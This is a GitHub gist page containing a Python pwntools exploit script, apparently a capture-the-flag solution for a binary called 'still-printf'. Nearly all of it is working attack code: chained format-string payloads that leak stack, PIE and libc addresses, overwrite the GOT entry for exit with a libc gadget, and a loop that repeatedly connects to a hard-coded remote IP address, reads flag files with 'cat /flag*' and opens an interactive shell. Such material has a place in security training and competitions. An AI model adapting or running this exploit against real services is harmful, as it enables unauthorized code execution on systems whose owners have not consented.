Skip to content

Instantly share code, notes, and snippets.

@hkraw
Last active December 24, 2020 13:39
Show Gist options
  • Save hkraw/a100302c9707a7227a0b2514dddc17ad to your computer and use it in GitHub Desktop.
Save hkraw/a100302c9707a7227a0b2514dddc17ad to your computer and use it in GitHub Desktop.
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
import subprocess
def PID():
print(subprocess.check_output(['pidof','still-printf']))
# Addr
libc_leak_offset = 0x2409b
gadget1 = 0x448a3
system = 0x449c0
# Hack
def Hack():
global io
exe = ELF('./still-printf')
magic_number = 0x1337
payload = ('%c%p'+'%c'*8 +'%c%c%c' +f'%{ (magic_number + 1 ) - (0xd + 0x5 + 0x8 )}c'+'%hn'+f'%{ 0xdd - ( (magic_number+1)&0xff) }c'+'%41$hhn').ljust(0x2f)
print(hex(len(payload)))
io.send(payload)
io.recvuntil('\xd0')
stack_leak = int(io.recvn(14),0)
print(hex(stack_leak))
payload2 = f'%{0xdd}c%11$hhn%12$p%13$p'.ljust(0x28,'A').encode() + p64(stack_leak - 0x8)[0:7]
io.send(payload2)
io.recvuntil('\xd0')
pie_base = int(io.recvn(14),0) - 0x1200
libc_leak = int(io.recvn(14),0)
libc_base = libc_leak - libc_leak_offset
print(hex(libc_base))
print(hex(pie_base))
payload3 = f'%{0xdd}c%11$hhn%{ ((pie_base+exe.got["exit"] )&0xffff) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(stack_leak + 0x30)+p64(stack_leak - 0x8)[0:7]
print(hex(len(payload3)))
io.send(payload3)
payload4 = f'%{0xdd}c%11$hhn%{ ( (libc_base+gadget1)&0xffff ) - 0xdd}c%12$hn'.ljust(0x28,'\0').encode() + p64(stack_leak - 0x8)[0:7]
io.send(payload4)
payload5 = f'%{0xdd}c%11$hhn%{ ( ( ( (libc_base+gadget1)&0xffffffff)&0xffff0000 ) >> 16 ) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(pie_base+exe.got['exit']+0x2)+p64(stack_leak - 0x8)[0:7]
io.send(payload5)
payload6 = f'%{ (pie_base + 0x1100 )&0xffff}c%10$hn'.ljust(0x20,'\0').encode()+p64(stack_leak-0x8) + p64(0)[0:7]
print(hex(len(payload6)))
io.send(payload6)
for i in xrange(4096):
try:
#io = process('./still-printf')
io = remote('168.119.161.224',9509)
Hack()
io.sendline('cat /flag*')
data = io.recv()
print(data)
io.interactive()
except:
io.close()
continue
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment